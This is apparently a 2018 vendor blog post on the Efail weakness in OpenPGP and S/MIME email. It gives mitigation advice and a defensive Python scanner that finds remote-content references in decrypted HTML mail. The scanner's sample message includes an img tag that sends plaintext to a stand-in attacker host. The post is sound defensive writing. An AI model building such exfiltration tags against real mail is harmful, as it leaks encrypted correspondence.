“Efail”: Email encryption can be insecure in combination with HTML mails

Researchers at Münster University of Applied Sciences have discovered a critical weakness in current email encryption solutions (OpenPGP, S/MIME). The “Süddeutsche Zeitung”, together with its investigation partners NDR and WDR, has published the most detailed report to date (in German). However, the Münster researchers led by Sebastian Schinzel, Professor of Applied Cryptography, are not expected to publish the technical details until tomorrow. In our view, there is no reason to panic until those details are fully known.

The “Süddeutsche” article states:

The researchers’ attack is based on two conditions: First, they are in possession of the ciphertext. Second, HTML is allowed in the email program.

Important: OpenPGP and S/MIME are not fundamentally insecure; the problem lies in how certain email clients and plug-ins handle decrypted content inside HTML mails, in particular the automatic loading of remote content. Companies that want to rule out any risk in the meantime can therefore disable HTML rendering, at least for incoming encrypted emails. Another precaution is to temporarily disable plug-ins that automatically decrypt encrypted emails inside the mail client. The US-based Electronic Frontier Foundation (EFF) has been advising this course of action.

More details can be found on the website efail.de. As a short-term measure against “efail” attacks, the researchers recommend that emails no longer be decrypted inside the mail program but in a separate application. This is exactly what happens for Retarus E-Mail Encryption customers: a separate gateway performs the decryption (the Münster researchers discuss gateways in Section 6.5 of their paper). Like our gateway vendor, we continue to recommend the long-standing IT security practice of blocking the loading of remote content in the email client. This second measure still matters with gateway decryption: the gateway takes decryption out of the client, but the exfiltration channel is the client fetching a remote resource referenced from the decrypted HTML, so remote-content loading should stay switched off.
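One way a decrypting gateway can enforce the “no remote content” recommendation on the plaintext before forwarding it, as an added example for this post (not Retarus or gateway-vendor code). It assumes the gateway already has the decrypted MIME message as a string; the tag/attribute table, the hypothetical `find_remote_refs` function and the sample message (including the `attacker.example` and `tracker.example` hosts) are constructed for illustration. A plain `<a href>` is only followed on click, so it is deliberately not flagged.

```python
"""Detect remote-content references in the HTML part of a (decrypted) MIME
message.  Added example for this post, not Retarus or gateway-vendor code.

Efail-style exfiltration needs the client to fetch a remote resource after
decryption; a gateway that decrypts mail centrally can run a check like this
on the plaintext and flag or strip such references.  The sample message at
the bottom is constructed for illustration (assumed hosts, not real ones)."""
import re
from email import message_from_string
from html.parser import HTMLParser

# Tag/attribute pairs that make a client fetch a resource while rendering.
# A plain <a href> is only followed on click, so it is deliberately absent.
AUTOLOAD_ATTRS = {
    "img": {"src", "srcset"}, "link": {"href"}, "script": {"src"},
    "iframe": {"src"}, "frame": {"src"}, "video": {"src", "poster"},
    "audio": {"src"}, "source": {"src"}, "object": {"data"},
    "embed": {"src"}, "input": {"src"}, "body": {"background"},
    "table": {"background"}, "td": {"background"},
}
# url(...) inside style attributes or <style> blocks also triggers a fetch.
CSS_URL = re.compile(r"url\(\s*['\"]?((?:https?:)?//[^)'\"\s]+)", re.I)


def is_remote(url):
    """True for absolute http(s) or protocol-relative URLs (cid:, data: are local)."""
    url = url.strip().lower()
    return url.startswith(("http://", "https://", "//"))


class RemoteRefFinder(HTMLParser):
    """Collects (tag, attribute, url) for every auto-loaded remote reference."""

    def __init__(self):
        super().__init__()
        self.refs = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        for name, value in attrs:
            if value is None:
                continue
            if name in AUTOLOAD_ATTRS.get(tag, ()) and is_remote(value):
                self.refs.append((tag, name, value))
            elif name == "style":
                for url in CSS_URL.findall(value):
                    self.refs.append((tag, "style", url))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # <style> blocks arrive as raw text; scan them for url(...) fetches.
        if self._in_style:
            for url in CSS_URL.findall(data):
                self.refs.append(("style", "css", url))


def find_remote_refs(raw_message):
    """Parse a MIME message and return remote references from its text/html parts."""
    msg = message_from_string(raw_message)
    finder = RemoteRefFinder()
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True)
        html = payload.decode(part.get_content_charset() or "utf-8", "replace")
        finder.feed(html)
    finder.close()
    return finder.refs


# Constructed sample: how a decrypted mail looks to the gateway after an
# attacker has wrapped the plaintext in an <img src="...">.  Rendered in a
# client that loads remote content, the plaintext would leave as part of the URL.
SAMPLE_MESSAGE = """\
From: alice@example.com
To: bob@example.com
Subject: minutes
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Secret plan: meeting at 10.
--b1
Content-Type: text/html; charset=utf-8

<html><body style="background: url(https://tracker.example/bg.png)">
<p>See <a href="https://wiki.example/minutes">the wiki</a>.</p>
<img src="https://attacker.example/?d=Secret%20plan%3A%20meeting%20at%2010.">
</body></html>
--b1--
"""

if __name__ == "__main__":
    for tag, attr, url in find_remote_refs(SAMPLE_MESSAGE):
        print(f"remote fetch via <{tag} {attr}>: {url}")
```

Run against the sample, the check reports the CSS background image and the `<img>` whose URL carries the plaintext, but not the clickable wiki link. A gateway would typically quarantine or rewrite messages with such references; the client-side setting that blocks remote content remains the backstop for anything the gateway does not see.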

We will of course keep an eye on the issue and keep you posted about any important developments.

(Last updated on May 15, 2018 at 14:30)